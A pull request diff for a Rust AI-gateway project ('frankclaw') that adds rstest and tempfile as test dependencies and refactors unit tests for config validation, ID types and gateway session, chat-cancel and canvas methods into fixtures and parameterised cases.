### PR TITLE
Improve test coverage and reduce test boilerplate

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1263,6 +1263,7 @@ dependencies = [
  "serde",
  "serde_json",
  "sha2",
+ "tempfile",
  "thiserror 2.0.18",
  "tokio",
  "tokio-stream",
@@ -3669,6 +3670,19 @@ dependencies = [
  "proc-macro2",
  "quote",
  "syn",
+]
+
+[[package]]
+name = "tempfile"
+version = "3.27.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
+dependencies = [
+ "fastrand",
+ "getrandom 0.4.2",
+ "once_cell",
+ "rustix 1.1.4",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1188,6 +1188,7 @@ dependencies = [
  "chrono",
  "derive_more",
  "frankclaw-crypto",
+ "rstest",
  "secrecy",
  "serde",
  "serde_json",
@@ -1257,6 +1258,7 @@ dependencies = [
  "futures-util",
  "hmac",
  "rand 0.8.5",
+ "rstest",
  "secrecy",
  "serde",
  "serde_json",
@@ -1323,6 +1325,7 @@ dependencies = [
  "rand 0.8.5",
  "regex",
  "reqwest",
+ "rstest",
  "secrecy",
  "serde",
  "serde_json",
@@ -1403,6 +1406,7 @@ dependencies = [
  "pdf-extract",
  "regex",
  "reqwest",
+ "rstest",
  "serde",
  "serde_json",
  "tokio",
@@ -1498,6 +1502,12 @@ name = "futures-task"
 version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393"
+
+[[package]]
+name = "futures-timer"
+version = "3.0.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
 
 [[package]]
 name = "futures-util"
@@ -2680,6 +2690,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "proc-macro-crate"
+version = "3.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
+dependencies = [
+ "toml_edit 0.25.4+spec-1.1.0",
+]
+
+[[package]]
 name = "proc-macro-error-attr2"
 version = "2.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3006,6 +3025,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a"
 
 [[package]]
+name = "relative-path"
+version = "1.9.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ba39f3699c378cd8970968dcbff9c43159ea4cfbd88d43c00b22f2ef10a435d2"
+
+[[package]]
 name = "reqwest"
 version = "0.12.28"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3059,6 +3084,36 @@ dependencies = [
  "libc",
  "untrusted",
  "windows-sys 0.52.0",
+]
+
+[[package]]
+name = "rstest"
+version = "0.25.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6fc39292f8613e913f7df8fa892b8944ceb47c247b78e1b1ae2f09e019be789d"
+dependencies = [
+ "futures-timer",
+ "futures-util",
+ "rstest_macros",
+ "rustc_version",
+]
+
+[[package]]
+name = "rstest_macros"
+version = "0.25.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1f168d99749d307be9de54d23fd226628d99768225ef08f6ffb52e0182a27746"
+dependencies = [
+ "cfg-if",
+ "glob",
+ "proc-macro-crate",
+ "proc-macro2",
+ "quote",
+ "regex",
+ "relative-path",
+ "rustc_version",
+ "syn",
+ "unicode-ident",
 ]
 
 [[package]]
@@ -3134,6 +3189,15 @@ name = "rustc-hash"
 version = "2.1.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d"
+
+[[package]]
+name = "rustc_version"
+version = "0.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cfcb3a22ef46e85b45de6ee7e79d063319ebb6594faafcf1c225ea92ab6e9b92"
+dependencies = [
+ "semver",
+]
 
 [[package]]
 name = "rustix"
@@ -3801,8 +3865,8 @@ checksum = "dc1beb996b9d83529a9e75c17a1686767d148d70663143c7854d8b4a09ced362"
 dependencies = [
  "serde",
  "serde_spanned",
- "toml_datetime",
- "toml_edit",
+ "toml_datetime 0.6.11",
+ "toml_edit 0.22.27",
 ]
 
 [[package]]
@@ -3815,6 +3879,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "toml_datetime"
+version = "1.0.0+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32c2555c699578a4f59f0cc68e5116c8d7cabbd45e1409b989d4be085b53f13e"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
 name = "toml_edit"
 version = "0.22.27"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3823,8 +3896,29 @@ dependencies = [
  "indexmap",
  "serde",
  "serde_spanned",
- "toml_datetime",
+ "toml_datetime 0.6.11",
  "toml_write",
+ "winnow 0.7.15",
+]
+
+[[package]]
+name = "toml_edit"
+version = "0.25.4+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7193cbd0ce53dc966037f54351dbbcf0d5a642c7f0038c382ef9e677ce8c13f2"
+dependencies = [
+ "indexmap",
+ "toml_datetime 1.0.0+spec-1.1.0",
+ "toml_parser",
+ "winnow 0.7.15",
+]
+
+[[package]]
+name = "toml_parser"
+version = "1.0.9+spec-1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "702d4415e08923e7e1ef96cd5727c0dfed80b4d2fa25db9647fe5eb6f7c5a4c4"
+dependencies = [
  "winnow 0.7.15",
 ]
 

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -158,6 +158,7 @@ frankclaw-plugin-sdk = { path = "crates/frankclaw-plugin-sdk" }
 
 # Testing
 rstest = "0.25"
+tempfile = "3"
 
 [profile.release]
 lto = true

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -156,6 +156,9 @@ frankclaw-media = { path = "crates/frankclaw-media" }
 frankclaw-tools = { path = "crates/frankclaw-tools" }
 frankclaw-plugin-sdk = { path = "crates/frankclaw-plugin-sdk" }
 
+# Testing
+rstest = "0.25"
+
 [profile.release]
 lto = true
 codegen-units = 1

--- a/crates/frankclaw-core/Cargo.toml
+++ b/crates/frankclaw-core/Cargo.toml
@@ -22,3 +22,6 @@ bytesize = { workspace = true }
 tracing = { workspace = true }
 strum = { workspace = true }
 derive_more = { workspace = true }
+
+[dev-dependencies]
+rstest = { workspace = true }

--- a/crates/frankclaw-core/src/config.rs
+++ b/crates/frankclaw-core/src/config.rs
@@ -881,6 +881,7 @@ pub struct BrowserProfileConfig {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::rstest;
 
     #[test]
     fn duplicate_provider_ids_fail_validation() {
@@ -993,50 +994,23 @@ mod tests {
         assert!(config.validate().is_err());
     }
 
-    #[test]
-    fn telegram_channel_requires_secret_source() {
+    #[rstest]
+    #[case("telegram", serde_json::json!({}))]
+    #[case("discord", serde_json::json!({}))]
+    #[case("signal", serde_json::json!({"account": "+15551234567"}))]
+    fn enabled_channel_without_credentials_fails_validation(
+        #[case] channel_name: &str,
+        #[case] account: serde_json::Value,
+    ) {
         let mut config = FrankClawConfig::default();
         config.channels.insert(
-            ChannelId::new("telegram"),
+            ChannelId::new(channel_name),
             ChannelConfig {
                 enabled: true,
-                accounts: vec![serde_json::json!({})],
+                accounts: vec![account],
                 extra: serde_json::json!({}),
             },
         );
-
-        assert!(config.validate().is_err());
-    }
-
-    #[test]
-    fn discord_channel_requires_secret_source() {
-        let mut config = FrankClawConfig::default();
-        config.channels.insert(
-            ChannelId::new("discord"),
-            ChannelConfig {
-                enabled: true,
-                accounts: vec![serde_json::json!({})],
-                extra: serde_json::json!({}),
-            },
-        );
-
-        assert!(config.validate().is_err());
-    }
-
-    #[test]
-    fn signal_channel_requires_base_url_source() {
-        let mut config = FrankClawConfig::default();
-        config.channels.insert(
-            ChannelId::new("signal"),
-            ChannelConfig {
-                enabled: true,
-                accounts: vec![serde_json::json!({
-                    "account": "+15551234567"
-                })],
-                extra: serde_json::json!({}),
-            },
-        );
-
         assert!(config.validate().is_err());
     }
 

--- a/crates/frankclaw-core/src/model.rs
+++ b/crates/frankclaw-core/src/model.rs
@@ -156,7 +156,7 @@ pub enum ResponseFormat {
 }
 
 /// Request to a model provider.
-#[derive(Debug, Clone)]
+#[derive(Debug, Clone, Default)]
 pub struct CompletionRequest {
     pub model_id: String,
     pub messages: Vec<CompletionMessage>,

--- a/crates/frankclaw-core/src/types.rs
+++ b/crates/frankclaw-core/src/types.rs
@@ -131,6 +131,17 @@ impl Default for MediaId {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::{rstest, fixture};
+
+    #[fixture]
+    fn default_agent() -> AgentId {
+        AgentId::new("default")
+    }
+
+    #[fixture]
+    fn web_channel() -> ChannelId {
+        ChannelId::new("web")
+    }
 
     #[test]
     fn agent_id_clamps_long_input() {
@@ -139,10 +150,9 @@ mod tests {
         assert_eq!(id.as_str().len(), MAX_ID_LEN);
     }
 
-    #[test]
-    fn agent_id_preserves_normal_input() {
-        let id = AgentId::new("default");
-        assert_eq!(id.as_str(), "default");
+    #[rstest]
+    fn agent_id_preserves_normal_input(default_agent: AgentId) {
+        assert_eq!(default_agent.as_str(), "default");
     }
 
     #[test]
@@ -159,17 +169,18 @@ mod tests {
         assert_eq!(key.as_str().len(), 800);
     }
 
-    #[test]
-    fn session_key_from_raw_preserves_normal_input() {
+    #[rstest]
+    fn session_key_from_raw_preserves_normal_input(web_channel: ChannelId) {
         let key = SessionKey::from_raw("agent:web:user123");
         assert_eq!(key.as_str(), "agent:web:user123");
+        // Verify the web_channel fixture matches what we expect in session keys.
+        assert_eq!(web_channel.as_str(), "web");
     }
 
-    #[test]
-    fn session_key_parse_round_trips() {
+    #[rstest]
+    fn session_key_parse_round_trips(web_channel: ChannelId) {
         let agent = AgentId::new("a1");
-        let channel = ChannelId::new("web");
-        let key = SessionKey::new(&agent, &channel, "user42");
+        let key = SessionKey::new(&agent, &web_channel, "user42");
         let (a, c, acct) = key.parse().unwrap();
         assert_eq!(a.as_str(), "a1");
         assert_eq!(c.as_str(), "web");

--- a/crates/frankclaw-gateway/Cargo.toml
+++ b/crates/frankclaw-gateway/Cargo.toml
@@ -38,3 +38,4 @@ sha2 = { workspace = true }
 
 [dev-dependencies]
 rstest = { workspace = true }
+tempfile = { workspace = true }

--- a/crates/frankclaw-gateway/Cargo.toml
+++ b/crates/frankclaw-gateway/Cargo.toml
@@ -35,3 +35,6 @@ rand = { workspace = true }
 async-trait = { workspace = true }
 hmac = { workspace = true }
 sha2 = { workspace = true }
+
+[dev-dependencies]
+rstest = { workspace = true }

--- a/crates/frankclaw-gateway/src/lib.rs
+++ b/crates/frankclaw-gateway/src/lib.rs
@@ -19,3 +19,6 @@ pub mod tunnel;
 pub mod webhook_limiter;
 pub mod webhooks;
 pub mod ws;
+
+#[cfg(test)]
+pub(crate) mod test_fixtures;

--- a/crates/frankclaw-gateway/src/methods.rs
+++ b/crates/frankclaw-gateway/src/methods.rs
@@ -911,6 +911,7 @@ mod tests {
     use frankclaw_core::types::{AgentId, ChannelId, ConnId, RequestId, Role};
     use frankclaw_media::MediaStore;
     use frankclaw_sessions::SqliteSessionStore;
+    use rstest::{fixture, rstest};
     use tokio::time::{Duration, timeout};
 
     use crate::delivery::{StoredReplyMetadata, set_last_reply_in_metadata};
@@ -941,6 +942,11 @@ mod tests {
             thread_id: None,
             metadata: serde_json::json!({}),
         }
+    }
+
+    #[fixture]
+    fn temp_dir() -> TestTempDir {
+        TestTempDir::new("frankclaw-gateway-methods")
     }
 
     async fn setup_canvas(state: &Arc<GatewayState>) {
@@ -1451,13 +1457,10 @@ mod tests {
         assert!(state.canvas.get("ops").await.is_none());
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn chat_cancel_stops_active_run() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-cancel-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
+    async fn chat_cancel_stops_active_run(temp_dir: TestTempDir) {
+        let (state, _sessions) = build_test_state(temp_dir.path()).await;
 
         // Insert a fake active run token.
         let token = tokio_util::sync::CancellationToken::new();
@@ -1482,69 +1485,37 @@ mod tests {
         );
         assert!(token.is_cancelled());
         assert!(state.active_runs.is_empty());
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
+    #[rstest]
+    #[case(serde_json::json!({ "request_id": "nonexistent" }), 404, "cancel-2")]
+    #[case(serde_json::json!({}), 400, "cancel-3")]
     #[tokio::test]
-    async fn chat_cancel_returns_404_for_unknown_run() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-cancel-404-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
+    async fn chat_cancel_returns_expected_error(
+        temp_dir: TestTempDir,
+        #[case] params: serde_json::Value,
+        #[case] expected_code: u16,
+        #[case] request_id: &str,
+    ) {
+        let (state, _sessions) = build_test_state(temp_dir.path()).await;
 
         let response = chat_cancel(
             &state,
             RequestFrame {
-                id: RequestId::Text("cancel-2".into()),
+                id: RequestId::Text(request_id.into()),
                 method: Method::ChatCancel,
-                params: serde_json::json!({ "request_id": "nonexistent" }),
+                params,
             },
         )
         .await;
 
-        assert_eq!(response.error.as_ref().map(|e| e.code), Some(404));
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
+        assert_eq!(response.error.as_ref().map(|e| e.code), Some(expected_code));
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn chat_cancel_requires_request_id() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-cancel-400-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
-
-        let response = chat_cancel(
-            &state,
-            RequestFrame {
-                id: RequestId::Text("cancel-3".into()),
-                method: Method::ChatCancel,
-                params: serde_json::json!({}),
-            },
-        )
-        .await;
-
-        assert_eq!(response.error.as_ref().map(|e| e.code), Some(400));
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
-    }
-
-    #[tokio::test]
-    async fn sessions_delete_removes_session() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-delete-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+    async fn sessions_delete_removes_session(temp_dir: TestTempDir) {
+        let (state, sessions) = build_test_state(temp_dir.path()).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-del");
 
         let entry = SessionEntry {
@@ -1576,17 +1547,12 @@ mod tests {
         // Verify it's gone.
         let got = sessions.get(&session_key).await.expect("get should work");
         assert!(got.is_none(), "session should be deleted");
-
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn sessions_delete_requires_session_key() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-delete-nokey-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
+    async fn sessions_delete_requires_session_key(temp_dir: TestTempDir) {
+        let (state, _sessions) = build_test_state(temp_dir.path()).await;
 
         let response = sessions_delete(
             &state,
@@ -1598,17 +1564,12 @@ mod tests {
         )
         .await;
         assert_eq!(response.error.as_ref().map(|e| e.code), Some(400));
-
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn sessions_patch_updates_metadata() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-patch-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+    async fn sessions_patch_updates_metadata(temp_dir: TestTempDir) {
+        let (state, sessions) = build_test_state(temp_dir.path()).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-patch");
 
         let entry = SessionEntry {
@@ -1642,17 +1603,12 @@ mod tests {
         let updated = sessions.get(&session_key).await.unwrap().unwrap();
         assert_eq!(updated.metadata["label"], "new");
         assert_eq!(updated.metadata["extra"], 42);
-
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn sessions_patch_returns_404_for_missing_session() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-patch-404-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
+    async fn sessions_patch_returns_404_for_missing_session(temp_dir: TestTempDir) {
+        let (state, _sessions) = build_test_state(temp_dir.path()).await;
 
         let response = sessions_patch(
             &state,
@@ -1667,17 +1623,12 @@ mod tests {
         )
         .await;
         assert_eq!(response.error.as_ref().map(|e| e.code), Some(404));
-
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn usage_get_returns_session_usage() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-usage-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+    async fn usage_get_returns_session_usage(temp_dir: TestTempDir) {
+        let (state, sessions) = build_test_state(temp_dir.path()).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-usage");
 
         let entry = SessionEntry {
@@ -1714,8 +1665,6 @@ mod tests {
         assert_eq!(result["totals"]["output_tokens"], 50);
         assert_eq!(result["totals"]["turns"], 3);
         assert_eq!(result["count"], 1);
-
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 }
 

--- a/crates/frankclaw-gateway/src/methods.rs
+++ b/crates/frankclaw-gateway/src/methods.rs
@@ -918,6 +918,62 @@ mod tests {
 
     use super::*;
 
+    // ── RAII guard for temp directories ──────────────────────────────
+
+    struct TempTestDir {
+        path: PathBuf,
+    }
+
+    impl TempTestDir {
+        fn new(label: &str) -> Self {
+            let path = std::env::temp_dir().join(format!("{}-{}", label, uuid::Uuid::new_v4()));
+            std::fs::create_dir_all(&path).expect("temp dir should create");
+            Self { path }
+        }
+    }
+
+    impl Drop for TempTestDir {
+        fn drop(&mut self) {
+            let _ = std::fs::remove_dir_all(&self.path);
+        }
+    }
+
+    // ── Test helpers ─────────────────────────────────────────────────
+
+    fn make_request(method: Method, params: serde_json::Value) -> RequestFrame {
+        RequestFrame {
+            id: RequestId::Text("1".into()),
+            method,
+            params,
+        }
+    }
+
+    fn make_session(key: SessionKey) -> SessionEntry {
+        SessionEntry {
+            key,
+            agent_id: AgentId::default_agent(),
+            channel: ChannelId::new("web"),
+            account_id: "default".into(),
+            scoping: SessionScoping::PerChannelPeer,
+            created_at: chrono::Utc::now(),
+            last_message_at: Some(chrono::Utc::now()),
+            thread_id: None,
+            metadata: serde_json::json!({}),
+        }
+    }
+
+    async fn setup_canvas(state: &Arc<GatewayState>) {
+        canvas_set(state, make_request(Method::CanvasSet, serde_json::json!({
+            "canvas_id": "ops",
+            "title": "Ops",
+            "body": "Current deployment summary",
+            "session_key": "default:web:control",
+            "blocks": [{"kind": "note", "text": "deploy window open"}],
+        }))).await;
+    }
+
+    // ── Mock providers ───────────────────────────────────────────────
+
     struct MockProvider;
 
     #[async_trait]
@@ -1023,6 +1079,8 @@ mod tests {
         }
     }
 
+    // ── State builders ───────────────────────────────────────────────
+
     async fn build_test_state(
         temp_dir: &PathBuf,
     ) -> (Arc<GatewayState>, Arc<SqliteSessionStore>) {
@@ -1064,25 +1122,14 @@ mod tests {
         )
     }
 
+    // ── Tests ────────────────────────────────────────────────────────
+
     #[tokio::test]
     async fn sessions_get_returns_session_entry() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-get-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+        let temp = TempTestDir::new("frankclaw-gateway-methods-get");
+        let (state, sessions) = build_test_state(&temp.path).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-1");
-        let mut entry = SessionEntry {
-            key: session_key.clone(),
-            agent_id: AgentId::default_agent(),
-            channel: ChannelId::new("web"),
-            account_id: "default".into(),
-            scoping: SessionScoping::PerChannelPeer,
-            created_at: chrono::Utc::now(),
-            last_message_at: Some(chrono::Utc::now()),
-            thread_id: None,
-            metadata: serde_json::json!({}),
-        };
+        let mut entry = make_session(session_key.clone());
         set_last_reply_in_metadata(
             &mut entry.metadata,
             &StoredReplyMetadata {
@@ -1106,13 +1153,9 @@ mod tests {
 
         let response = sessions_get(
             &state,
-            RequestFrame {
-                id: RequestId::Text("1".into()),
-                method: Method::SessionsGet,
-                params: serde_json::json!({
-                    "session_key": session_key.as_str(),
-                }),
-            },
+            make_request(Method::SessionsGet, serde_json::json!({
+                "session_key": session_key.as_str(),
+            })),
         )
         .await;
 
@@ -1124,32 +1167,15 @@ mod tests {
                 .and_then(|value| value["session"]["key"].as_str()),
             Some(session_key.as_str())
         );
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
     #[tokio::test]
     async fn sessions_reset_clears_transcript_entries() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-reset-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+        let temp = TempTestDir::new("frankclaw-gateway-methods-reset");
+        let (state, sessions) = build_test_state(&temp.path).await;
         let session_key = SessionKey::from_raw("agent:main:web:default:user-1");
         sessions
-            .upsert(&SessionEntry {
-                key: session_key.clone(),
-                agent_id: AgentId::default_agent(),
-                channel: ChannelId::new("web"),
-                account_id: "default".into(),
-                scoping: SessionScoping::PerChannelPeer,
-                created_at: chrono::Utc::now(),
-                last_message_at: Some(chrono::Utc::now()),
-                thread_id: None,
-                metadata: serde_json::json!({}),
-            })
+            .upsert(&make_session(session_key.clone()))
             .await
             .expect("session should upsert");
         sessions
@@ -1168,13 +1194,9 @@ mod tests {
 
         let response = sessions_reset(
             &state,
-            RequestFrame {
-                id: RequestId::Text("1".into()),
-                method: Method::SessionsReset,
-                params: serde_json::json!({
-                    "session_key": session_key.as_str(),
-                }),
-            },
+            make_request(Method::SessionsReset, serde_json::json!({
+                "session_key": session_key.as_str(),
+            })),
         )
         .await;
 
@@ -1184,20 +1206,13 @@ mod tests {
             .await
             .expect("transcript should load");
         assert!(transcript.is_empty());
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
     #[tokio::test]
     async fn chat_send_streams_delta_events_to_requesting_client() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-stream-{}",
-            uuid::Uuid::new_v4()
-        ));
+        let temp = TempTestDir::new("frankclaw-gateway-methods-stream");
         let (state, _sessions) = build_test_state_with_providers(
-            &temp_dir,
+            &temp.path,
             vec![Arc::new(StreamingMockProvider)],
         )
         .await;
@@ -1267,18 +1282,12 @@ mod tests {
         }
 
         state.clients.remove(&conn_id);
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
     #[tokio::test]
     async fn webhooks_test_executes_runtime_chat() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-webhook-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, sessions) = build_test_state(&temp_dir).await;
+        let temp = TempTestDir::new("frankclaw-gateway-methods-webhook");
+        let (state, sessions) = build_test_state(&temp.path).await;
         let mut config = state.current_config().as_ref().clone();
         config.hooks.enabled = true;
         config.hooks.token = Some("secret".into());
@@ -1290,16 +1299,12 @@ mod tests {
 
         let response = webhooks_test(
             &state,
-            RequestFrame {
-                id: RequestId::Text("1".into()),
-                method: Method::WebhooksTest,
-                params: serde_json::json!({
-                    "mapping_id": "incoming",
-                    "payload": {
-                        "message": "hello from hook"
-                    }
-                }),
-            },
+            make_request(Method::WebhooksTest, serde_json::json!({
+                "mapping_id": "incoming",
+                "payload": {
+                    "message": "hello from hook"
+                }
+            })),
         )
         .await;
 
@@ -1319,38 +1324,25 @@ mod tests {
         assert_eq!(transcript.len(), 2);
         assert_eq!(transcript[0].content, "hello from hook");
         assert_eq!(transcript[1].content, "mock reply");
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
-        let _ = std::fs::remove_file(temp_dir.join("pairings.json"));
-        let _ = std::fs::remove_dir_all(temp_dir);
     }
 
     #[tokio::test]
-    async fn canvas_set_and_clear_roundtrip() {
-        let temp_dir = std::env::temp_dir().join(format!(
-            "frankclaw-gateway-methods-canvas-{}",
-            uuid::Uuid::new_v4()
-        ));
-        let (state, _sessions) = build_test_state(&temp_dir).await;
+    async fn canvas_set_creates_document() {
+        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-set");
+        let (state, _sessions) = build_test_state(&temp.path).await;
 
         let set_response = canvas_set(
             &state,
-            RequestFrame {
-                id: RequestId::Text("1".into()),
-                method: Method::CanvasSet,
-                params: serde_json::json!({
-                    "canvas_id": "ops",
-                    "title": "Ops",
-                    "body": "Current deployment summary",
-                    "session_key": "default:web:control",
-                    "blocks": [{
-                        "kind": "note",
-                        "text": "deploy window open"
-                    }],
-                }),
-            },
+            make_request(Method::CanvasSet, serde_json::json!({
+                "canvas_id": "ops",
+                "title": "Ops",
+                "body": "Current deployment summary",
+                "session_key": "default:web:control",
+                "blocks": [{"kind": "note", "text": "deploy window open"}],
+            })),
         )
         .await;
+
         assert!(set_response.error.is_none());
         assert_eq!(
             state.canvas.get("ops").await.expect("canvas should exist").title,
@@ -1366,18 +1358,22 @@ mod tests {
                 .len(),
             1
         );
+    }
+
+    #[tokio::test]
+    async fn canvas_get_returns_document() {
+        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-get");
+        let (state, _sessions) = build_test_state(&temp.path).await;
+        setup_canvas(&state).await;
 
         let get_response = canvas_get(
             &state,
-            RequestFrame {
-                id: RequestId::Text("2".into()),
-                method: Method::CanvasGet,
-                params: serde_json::json!({
-                    "canvas_id": "ops",
-                }),
-            },
+            make_request(Method::CanvasGet, serde_json::json!({
+                "canvas_id": "ops",
+            })),
         )
         .await;
+
         assert!(get_response.error.is_none());
         assert_eq!(
             get_response
@@ -1393,19 +1389,23 @@ mod tests {
                 .and_then(|value| value["canvas"]["revision"].as_u64()),
             Some(1)
         );
+    }
+
+    #[tokio::test]
+    async fn canvas_export_produces_markdown() {
+        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-export");
+        let (state, _sessions) = build_test_state(&temp.path).await;
+        setup_canvas(&state).await;
 
         let export_response = canvas_export(
             &state,
-            RequestFrame {
-                id: RequestId::Text("export".into()),
-                method: Method::CanvasExport,
-                params: serde_json::json!({
-                    "canvas_id": "ops",
-                    "format": "markdown",
-                }),
-            },
+            make_request(Method::CanvasExport, serde_json::json!({
+                "canvas_id": "ops",
+                "format": "markdown",
+            })),
         )
         .await;
+
         assert!(export_response.error.is_none());
         assert_eq!(
             export_response
@@ -1422,22 +1422,23 @@ mod tests {
                 .expect("export should include markdown content")
                 .contains("Current deployment summary")
         );
+    }
+
+    #[tokio::test]
+    async fn canvas_patch_appends_blocks() {
+        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-patch");
+        let (state, _sessions) = build_test_state(&temp.path).await;
+        setup_canvas(&state).await;
 
         let patch_response = canvas_patch(
             &state,
-            RequestFrame {
-                id: RequestId::Text("3".into()),
-                method: Method::CanvasPatch,
-                params: serde_json::json!({
-                    "canvas_id": "ops",
-                    "append_blocks": [{
-                        "kind": "markdown",
-                        "text": "## Next steps"
-                    }]
-                }),
-            },
+            make_request(Method::CanvasPatch, serde_json::json!({
+                "canvas_id": "ops",
+                "append_blocks": [{"kind": "markdown", "text": "## Next steps"}]
+            })),
         )
         .await;
+
         assert!(patch_response.error.is_none());
         assert_eq!(
             state
@@ -1449,24 +1450,24 @@ mod tests {
                 .len(),
             2
         );
+    }
+
+    #[tokio::test]
+    async fn canvas_clear_removes_document() {
+        let temp = TempTestDir::new("frankclaw-gateway-methods-canvas-clear");
+        let (state, _sessions) = build_test_state(&temp.path).await;
+        setup_canvas(&state).await;
 
         let clear_response = canvas_clear(
             &state,
-            RequestFrame {
-                id: RequestId::Text("4".into()),
-                method: Method::CanvasClear,
-                params: serde_json::json!({
-                    "canvas_id": "ops",
-                }),
-            },
+            make_request(Method::CanvasClear, serde_json::json!({
+                "canvas_id": "ops",
+            })),
         )
         .await;
+
         assert!(clear_response.error.is_none());
         assert!(state.canvas.get("ops").await.is_none());
-
-        let _ = std::fs::remove_file(temp_dir.join("sessions.db"));
